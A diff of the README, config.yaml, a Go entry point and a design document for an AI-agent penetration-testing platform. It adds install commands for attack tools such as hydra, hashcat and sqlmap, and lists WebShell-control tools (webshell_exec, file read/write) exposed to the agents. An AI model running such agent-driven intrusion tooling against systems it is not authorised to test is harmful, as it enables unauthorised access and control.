- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
|
- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
|
||||||
@@ -189,14 +188,21 @@ chmod +x run.sh && ./run.sh
|
|||||||
```
|
```
|
||||||
- 或启动前直接编辑 `config.yaml` 文件
|
- 或启动前直接编辑 `config.yaml` 文件
|
||||||
2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password`)
|
2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password`)
|
||||||
3. **安装安全工具(可选)** - 按需安装所需工具:
|
3. **安装安全工具(可选)** - 按需安装 `tools/` 目录中的工具;未安装的工具在执行时会自动跳过或改用替代方案。常用示例:
|
||||||
|
|
||||||
|
**macOS(Homebrew):**
|
||||||
```bash
|
```bash
|
||||||
# macOS
|
brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
|
||||||
brew install nmap sqlmap nuclei httpx gobuster feroxbuster subfinder amass
|
|
||||||
# Ubuntu/Debian
|
|
||||||
sudo apt-get install nmap sqlmap nuclei httpx gobuster feroxbuster
|
|
||||||
```
|
```
|
||||||
未安装的工具会自动跳过或改用替代方案。
|
|
||||||
|
**Linux(Kali / Debian / Ubuntu):**
|
||||||
|
```bash
|
||||||
|
sudo apt update
|
||||||
|
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
|
||||||
|
# 部分发行版需自行安装:ffuf、nuclei、subfinder 等可用 go install 或见各工具官网
|
||||||
|
```
|
||||||
|
|
||||||
|
完整工具列表见 `tools/` 目录;各工具安装方式以官方文档为准。
|
||||||
|
|
||||||
**其他启动方式:**
|
**其他启动方式:**
|
||||||
```bash
|
```bash
|
||||||
@@ -258,7 +264,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
|||||||
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
|
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
|
||||||
- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
|
- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
|
||||||
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
|
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
|
||||||
- **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。中间件与本机 read_file/glob/grep 等见文档。
|
- **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。可选 **`eino_middleware`**(tool_search、plantask、reduction、checkpoint、Summarization 转录等)与本机 read_file/glob/grep 等见文档。
|
||||||
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。
|
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。
|
||||||
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
|
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
|
||||||
|
|
||||||
@@ -286,6 +292,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
|||||||
- **子代理**(**deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。
|
- **子代理**(**deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。
|
||||||
- **界面管理**:**Agents → Agent 管理**;API `/api/multi-agent/markdown-agents`。
|
- **界面管理**:**Agents → Agent 管理**;API `/api/multi-agent/markdown-agents`。
|
||||||
- **配置项**:`multi_agent`:`enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。
|
- **配置项**:`multi_agent`:`enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。
|
||||||
|
- **长任务与恢复**:`checkpoint_dir` 支持进程崩溃后 ADK **断点续跑**(与基于 trace 的「中断继续」不同)。`deep_model_retry_max_retries` 在同一次 LLM 调用内重试瞬时 API 失败。**Summarization** 触发压缩时会写入过滤后的 **transcript**,摘要消息中带路径,模型可用 `read_file` 找回扫描输出等压缩前细节。
|
||||||
- **更多细节**:[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。
|
- **更多细节**:[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。
|
||||||
|
|
||||||
### Skills 技能系统(Agent Skills + Eino)
|
### Skills 技能系统(Agent Skills + Eino)
|
||||||
@@ -293,7 +300,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
|||||||
- **运行侧重构**:**`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。
|
- **运行侧重构**:**`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。
|
||||||
- **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever`(`skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。
|
- **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever`(`skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。
|
||||||
- **HTTP 管理**:`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。
|
- **HTTP 管理**:`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。
|
||||||
- **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、`plantask`(结构化任务;默认落在 `skills_dir` 下子目录)、`reduction`、`checkpoint_dir`、Deep 输出键 / 模型重试 / task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。
|
- **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、**`plantask`**(Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`;JSON 存于 `skills_dir/.eino/plantask/<会话ID>/`;**全部**任务标为 completed 后 Eino 会清理任务文件)、`reduction`、**`checkpoint_dir`**(如 `data/eino-checkpoints/`)、**`deep_model_retry_max_retries`**、**`deep_output_key`**、task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。
|
||||||
- **自带示例**:`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。
|
- **自带示例**:`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。
|
||||||
|
|
||||||
**新建技能:**
|
**新建技能:**
|
||||||
@@ -303,7 +310,7 @@ go build -o cyberstrike-ai cmd/server/main.go
|
|||||||
### 工具编排与扩展
|
### 工具编排与扩展
|
||||||
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
|
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
|
||||||
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
|
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
|
||||||
- **大结果分页**:超过 200KB 的输出会保存为附件,可通过 `query_execution_result` 工具分页、过滤、正则检索。
|
- **大工具输出**:超过 `reduction_max_length_for_trunc` 时由 Eino reduction 摘要,完整内容落盘至 `tmp/reduction/`;按 `<persisted-output>` 中的路径用 `read_file` 读取。
|
||||||
- **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。
|
- **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。
|
||||||
|
|
||||||
**自定义工具的一般步骤**
|
**自定义工具的一般步骤**
|
||||||
@@ -541,7 +548,12 @@ multi_agent:
|
|||||||
orchestrator_instruction: "" # Deep;orchestrator.md 正文为空时使用
|
orchestrator_instruction: "" # Deep;orchestrator.md 正文为空时使用
|
||||||
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选
|
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选
|
||||||
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
|
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
|
||||||
# eino_middleware: 可选 patch_tool_calls、tool_search、plantask、reduction、checkpoint_dir 等
|
# eino_middleware: plantask_enable、checkpoint_dir、deep_model_retry_max_retries、deep_output_key 等
|
||||||
|
project:
|
||||||
|
enabled: true # 启用项目黑板与事实 MCP 工具
|
||||||
|
fact_index_max_runes: 65000
|
||||||
|
fact_summary_max_runes: 24000
|
||||||
|
default_inject_deprecated: false
|
||||||
```
|
```
|
||||||
|
|
||||||
### 工具模版示例(`tools/nmap.yaml`)
|
### 工具模版示例(`tools/nmap.yaml`)
|
||||||
|
|||||||
@@ -5,7 +5,6 @@ import (
|
|||||||
"cyberstrike-ai/internal/logger"
|
"cyberstrike-ai/internal/logger"
|
||||||
"cyberstrike-ai/internal/mcp"
|
"cyberstrike-ai/internal/mcp"
|
||||||
"cyberstrike-ai/internal/security"
|
"cyberstrike-ai/internal/security"
|
||||||
"cyberstrike-ai/internal/storage"
|
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
"os"
|
"os"
|
||||||
@@ -33,23 +32,6 @@ func main() {
|
|||||||
// 创建安全工具执行器
|
// 创建安全工具执行器
|
||||||
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
|
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
|
||||||
|
|
||||||
// 初始化结果存储(与 internal/app/app.go 同样的逻辑)。
|
|
||||||
// stdio 模式下原本不初始化,导致 'exec' 等查询型工具报"结果存储未初始化"。
|
|
||||||
resultStorageDir := "tmp"
|
|
||||||
if cfg.Agent.ResultStorageDir != "" {
|
|
||||||
resultStorageDir = cfg.Agent.ResultStorageDir
|
|
||||||
}
|
|
||||||
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
|
|
||||||
fmt.Fprintf(os.Stderr, "创建结果存储目录失败: %v\n", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
|
|
||||||
if err != nil {
|
|
||||||
fmt.Fprintf(os.Stderr, "初始化结果存储失败: %v\n", err)
|
|
||||||
os.Exit(1)
|
|
||||||
}
|
|
||||||
executor.SetResultStorage(resultStorage)
|
|
||||||
|
|
||||||
// 注册工具
|
// 注册工具
|
||||||
executor.RegisterTools(mcpServer)
|
executor.RegisterTools(mcpServer)
|
||||||
|
|
||||||
@@ -61,4 +43,3 @@ func main() {
|
|||||||
os.Exit(1)
|
os.Exit(1)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
+19
-19
@@ -10,7 +10,7 @@
|
|||||||
# ============================================
|
# ============================================
|
||||||
|
|
||||||
# 前端显示的版本号(可选,不填则显示默认版本)
|
# 前端显示的版本号(可选,不填则显示默认版本)
|
||||||
version: "v1.6.30"
|
version: "v1.6.44"
|
||||||
# 服务器配置
|
# 服务器配置
|
||||||
server:
|
server:
|
||||||
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
|
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
|
||||||
@@ -40,6 +40,9 @@ audit:
|
|||||||
retention_days: 15 # 0 表示不自动清理
|
retention_days: 15 # 0 表示不自动清理
|
||||||
max_detail_bytes: 8192
|
max_detail_bytes: 8192
|
||||||
auth_failure_cooldown_seconds: 60 # 同一 IP 登录/改密失败审计最短间隔(秒);未配置时默认 60;-1 关闭节流
|
auth_failure_cooldown_seconds: 60 # 同一 IP 登录/改密失败审计最短间隔(秒);未配置时默认 60;-1 关闭节流
|
||||||
|
# MCP 状态监控执行记录保留(tool_executions 表)
|
||||||
|
monitor:
|
||||||
|
retention_days: 90 # 省略时默认 90;0 表示不自动清理
|
||||||
# ============================================
|
# ============================================
|
||||||
# 对话相关配置
|
# 对话相关配置
|
||||||
# ============================================
|
# ============================================
|
||||||
@@ -58,7 +61,7 @@ openai:
|
|||||||
api_key: sk-xxxxxxx # API 密钥(必填)
|
api_key: sk-xxxxxxx # API 密钥(必填)
|
||||||
model: qwen3-max # 模型名称(必填)
|
model: qwen3-max # 模型名称(必填)
|
||||||
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
|
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
|
||||||
# Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effort 等;provider 为 claude 时合并为 Anthropic 顶层 thinking(extended thinking),mode: off 关闭
|
# Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effort;Claude 4.6+ 为 adaptive + output_config.effort(仅显式配置 effort 时下发);3.7 为 enabled+budget_tokens:10000(文档示例),effort 不映射,自定义预算用 extra_request_fields
|
||||||
reasoning:
|
reasoning:
|
||||||
mode: on # auto | on | off;off 时不附加任何推理扩展字段
|
mode: on # auto | on | off;off 时不附加任何推理扩展字段
|
||||||
effort: high # low | medium | high | max | xhigh(最高档:OpenAI 常用 xhigh,部分网关用 max,原样下发);空表示不指定
|
effort: high # low | medium | high | max | xhigh(最高档:OpenAI 常用 xhigh,部分网关用 max,原样下发);空表示不指定
|
||||||
@@ -79,7 +82,6 @@ vision:
|
|||||||
skip_preprocess_below_bytes: 2097152 # 低于 2MB 且长边<=max_dimension 且<=max_payload 时原图直传;0=始终压缩
|
skip_preprocess_below_bytes: 2097152 # 低于 2MB 且长边<=max_dimension 且<=max_payload 时原图直传;0=始终压缩
|
||||||
detail: auto # low | high | auto(Eino ImageURLDetail)
|
detail: auto # low | high | auto(Eino ImageURLDetail)
|
||||||
timeout_seconds: 60
|
timeout_seconds: 60
|
||||||
# allowed_roots: [] # 额外允许的绝对路径根目录
|
|
||||||
# ============================================
|
# ============================================
|
||||||
# 信息收集(FOFA)配置(可选)
|
# 信息收集(FOFA)配置(可选)
|
||||||
# ============================================
|
# ============================================
|
||||||
@@ -92,9 +94,7 @@ fofa:
|
|||||||
# Agent 配置
|
# Agent 配置
|
||||||
# 达到最大迭代次数时,AI 会自动总结测试结果
|
# 达到最大迭代次数时,AI 会自动总结测试结果
|
||||||
agent:
|
agent:
|
||||||
max_iterations: 12000 # 最大迭代次数,AI 代理最多执行多少轮工具调用
|
max_iterations: 12000 # 全局最大迭代次数(单代理 / Deep / Supervisor / Plan-Execute 主执行器 / 子代理均沿用;agents/*.md 中 max_iterations>0 可单独覆盖)
|
||||||
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
|
|
||||||
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
|
|
||||||
tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
|
tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
|
||||||
# system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
|
# system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
|
||||||
|
|
||||||
@@ -110,10 +110,8 @@ multi_agent:
|
|||||||
enabled: true
|
enabled: true
|
||||||
robot_default_agent_mode: eino_single # 企微/钉钉/飞书机器人默认:eino_single | deep | plan_execute | supervisor
|
robot_default_agent_mode: eino_single # 企微/钉钉/飞书机器人默认:eino_single | deep | plan_execute | supervisor
|
||||||
batch_use_multi_agent: false # true 时「批量任务」队列中每个子任务也走 Eino 多代理(成本更高)
|
batch_use_multi_agent: false # true 时「批量任务」队列中每个子任务也走 Eino 多代理(成本更高)
|
||||||
max_iteration: 0 # 主代理 / plan_execute 执行器最大轮次,0 表示沿用 agent.max_iterations
|
# plan_execute 专用:execute↔replan 外层循环上限,0 表示 Eino 默认 10。主/子代理 ReAct 轮次见 agent.max_iterations。
|
||||||
# plan_execute 专用:execute↔replan 外层循环上限,0 表示 Eino 默认 10。当前实现下 Executor 会挂载 patch/reduction/tool_search 等前置中间件。
|
|
||||||
plan_execute_loop_max_iterations: 0
|
plan_execute_loop_max_iterations: 0
|
||||||
sub_agent_max_iterations: 120
|
|
||||||
sub_agent_user_context_max_runes: 0 # 子代理 task 描述中自动注入用户原始请求的字符上限;0=默认2000,负数=禁用
|
sub_agent_user_context_max_runes: 0 # 子代理 task 描述中自动注入用户原始请求的字符上限;0=默认2000,负数=禁用
|
||||||
without_general_sub_agent: false # false 时保留 Deep 内置 general-purpose 子代理
|
without_general_sub_agent: false # false 时保留 Deep 内置 general-purpose 子代理
|
||||||
without_write_todos: false
|
without_write_todos: false
|
||||||
@@ -132,8 +130,8 @@ multi_agent:
|
|||||||
tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用
|
tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用
|
||||||
tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁
|
tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁
|
||||||
tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略)
|
tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略)
|
||||||
plantask_enable: false # true:主代理(Deep / Supervisor 主)挂载 TaskCreate/Get/Update/List;需 eino_skills 可用且 skills_dir 存在,否则仅打日志并跳过
|
plantask_enable: true # P0:主代理挂载 TaskCreate/Get/Update/List 结构化任务板;需 eino_skills 可用且 skills_dir 存在
|
||||||
plantask_rel_dir: .eino/plantask # 结构化任务文件相对 skills_dir 的子目录,其下再按会话 ID 分子目录存放
|
plantask_rel_dir: .eino/plantask # 任务文件相对 skills_dir,按会话分子目录:skills/.eino/plantask/<conversationId>/
|
||||||
reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载
|
reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载
|
||||||
reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理)
|
reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理)
|
||||||
reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果
|
reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果
|
||||||
@@ -146,11 +144,11 @@ multi_agent:
|
|||||||
plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例
|
plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例
|
||||||
plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断)
|
plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断)
|
||||||
plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题
|
plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题
|
||||||
checkpoint_dir: "" # 非空:为 adk.NewRunner 启用按会话子目录的文件型 CheckPointStore,便于中断恢复持久化;Resume 的 HTTP/前端流程需另行对接
|
checkpoint_dir: data/eino-checkpoints # P0:进程崩溃/OOM 后同会话自动 ADK Resume;正常结束会删 .ckpt;与「中断并继续」(last_react_*) 是两套机制
|
||||||
run_retry_max_attempts: 0 # >0:429/5xx/网络抖动时 ADK 运行循环指数退避续跑次数;0=默认 10
|
run_retry_max_attempts: 0 # 429/5xx/网络抖动时可退避重试次数(run loop + summarization 共用 isEinoTransientRunError);0=默认 10
|
||||||
run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30
|
run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30
|
||||||
deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(Deep 与 Supervisor 主代理);空表示不写入
|
deep_output_key: final_answer # P0:Eino session 写入最终助手结论(框架内部;Deep/Supervisor 主/eino_single)
|
||||||
deep_model_retry_max_retries: 0 # >0:ChatModel 调用失败时的框架级最大重试次数(Deep 与 Supervisor 主);0:不重试
|
deep_model_retry_max_retries: 0 # 已废弃,请用 run_retry_max_attempts;保留字段仅为兼容旧配置
|
||||||
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
|
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
|
||||||
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client)
|
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client)
|
||||||
eino_callbacks:
|
eino_callbacks:
|
||||||
@@ -295,7 +293,7 @@ skills_dir: skills # Skills配置文件目录(相对于配置文件所在目
|
|||||||
# ============================================
|
# ============================================
|
||||||
# 多代理子 Agent(Markdown,唯一维护处)
|
# 多代理子 Agent(Markdown,唯一维护处)
|
||||||
# ============================================
|
# ============================================
|
||||||
# 每个 .md:YAML front matter(name / id / description / tools / bind_role / max_iterations / 可选 kind: orchestrator)+ 正文为系统提示词
|
# 每个 .md:YAML front matter(name / id / description / tools / bind_role / 可选 max_iterations>0 覆盖全局 / 可选 kind: orchestrator)+ 正文为系统提示词
|
||||||
# 主代理:固定文件名 orchestrator.md,或任意文件名 + front matter kind: orchestrator(全目录仅允许一个);主代理不参与 task 子代理列表
|
# 主代理:固定文件名 orchestrator.md,或任意文件名 + front matter kind: orchestrator(全目录仅允许一个);主代理不参与 task 子代理列表
|
||||||
# 高级用法:仍可在 multi_agent 块内写 sub_agents,会与本文目录合并且同 id 时 YAML 可被 .md 覆盖
|
# 高级用法:仍可在 multi_agent 块内写 sub_agents,会与本文目录合并且同 id 时 YAML 可被 .md 覆盖
|
||||||
agents_dir: agents
|
agents_dir: agents
|
||||||
@@ -313,7 +311,9 @@ roles_dir: roles # 角色配置文件目录(相对于配置文件所在目录
|
|||||||
project:
|
project:
|
||||||
enabled: true
|
enabled: true
|
||||||
# default_project_id: "" # 可选:机器人/批量任务创建对话时的默认项目 ID
|
# default_project_id: "" # 可选:机器人/批量任务创建对话时的默认项目 ID
|
||||||
fact_index_max_runes: 3500
|
fact_index_max_runes: 65000
|
||||||
fact_summary_max_runes: 240
|
# 事实关系速览段预算(从索引总预算中预留)
|
||||||
|
fact_index_path_max_runes: 10000
|
||||||
|
fact_summary_max_runes: 24000
|
||||||
default_inject_deprecated: false
|
default_inject_deprecated: false
|
||||||
|
|
||||||
|
|||||||
@@ -12,7 +12,7 @@
|
|||||||
| 项 | 说明 |
|
| 项 | 说明 |
|
||||||
|----|------|
|
|----|------|
|
||||||
| 依赖与代理 | `go.mod` 直接依赖 `github.com/cloudwego/eino`、`eino-ext/.../openai`;`go.mod` 注释与 `scripts/bootstrap-go.sh` 指导 **GOPROXY**(如 `https://goproxy.cn,direct`)。 |
|
| 依赖与代理 | `go.mod` 直接依赖 `github.com/cloudwego/eino`、`eino-ext/.../openai`;`go.mod` 注释与 `scripts/bootstrap-go.sh` 指导 **GOPROXY**(如 `https://goproxy.cn,direct`)。 |
|
||||||
| 配置 | `config.yaml` → `multi_agent`:`enabled`、`robot_use_multi_agent`、`max_iteration`、`sub_agents`(含可选 `bind_role`)、`eino_skills`、`eino_middleware` 等;结构体见 `internal/config/config.go`。 |
|
| 配置 | `config.yaml` → `agent.max_iterations` 为全局 ReAct 上限(主/子代理统一);`multi_agent`:`enabled`、`robot_use_multi_agent`、`sub_agents`(含可选 `bind_role`)、`eino_skills`、`eino_middleware` 等;结构体见 `internal/config/config.go`。 |
|
||||||
| Markdown 子代理 / 主代理 | 在 `agents_dir` 下放 `*.md`。**子代理**:供 Deep `task` 与 `supervisor` `transfer`。**主代理(按模式分离)**:`orchestrator.md`(或 `kind: orchestrator` 的**单个**其他 .md)→ **Deep**;固定名 `orchestrator-plan-execute.md` → **plan_execute**;固定名 `orchestrator-supervisor.md` → **supervisor**。正文优先于 YAML:`multi_agent.orchestrator_instruction`、`orchestrator_instruction_plan_execute`、`orchestrator_instruction_supervisor`;plan_execute / supervisor **不会**回退到 Deep 的 `orchestrator_instruction`。皆空时 plan_execute / supervisor 使用代码内置默认提示。管理:**Agents → Agent管理**;API:`/api/multi-agent/markdown-agents*`。 |
|
| Markdown 子代理 / 主代理 | 在 `agents_dir` 下放 `*.md`。**子代理**:供 Deep `task` 与 `supervisor` `transfer`。**主代理(按模式分离)**:`orchestrator.md`(或 `kind: orchestrator` 的**单个**其他 .md)→ **Deep**;固定名 `orchestrator-plan-execute.md` → **plan_execute**;固定名 `orchestrator-supervisor.md` → **supervisor**。正文优先于 YAML:`multi_agent.orchestrator_instruction`、`orchestrator_instruction_plan_execute`、`orchestrator_instruction_supervisor`;plan_execute / supervisor **不会**回退到 Deep 的 `orchestrator_instruction`。皆空时 plan_execute / supervisor 使用代码内置默认提示。管理:**Agents → Agent管理**;API:`/api/multi-agent/markdown-agents*`。 |
|
||||||
| MCP 桥 | `internal/einomcp`:`ToolsFromDefinitions` + 会话 ID 持有者,执行走 `Agent.ExecuteMCPToolForConversation`。 |
|
| MCP 桥 | `internal/einomcp`:`ToolsFromDefinitions` + 会话 ID 持有者,执行走 `Agent.ExecuteMCPToolForConversation`。 |
|
||||||
| 编排 | `internal/multiagent/runner.go`:`deep.New` + 子 `ChatModelAgent` + `adk.NewRunner`(`EnableStreaming: true`,可选 `CheckPointStore`),事件映射为现有 SSE `tool_call` / `response_delta` 等。 |
|
| 编排 | `internal/multiagent/runner.go`:`deep.New` + 子 `ChatModelAgent` + `adk.NewRunner`(`EnableStreaming: true`,可选 `CheckPointStore`),事件映射为现有 SSE `tool_call` / `response_delta` 等。 |
|
||||||
|
|||||||
+2
-8
@@ -22,7 +22,6 @@ vision:
|
|||||||
skip_preprocess_below_bytes: 2097152 # 低于 2MB 且长边<=max_dimension 时原图直传;0=始终 JPEG 压缩
|
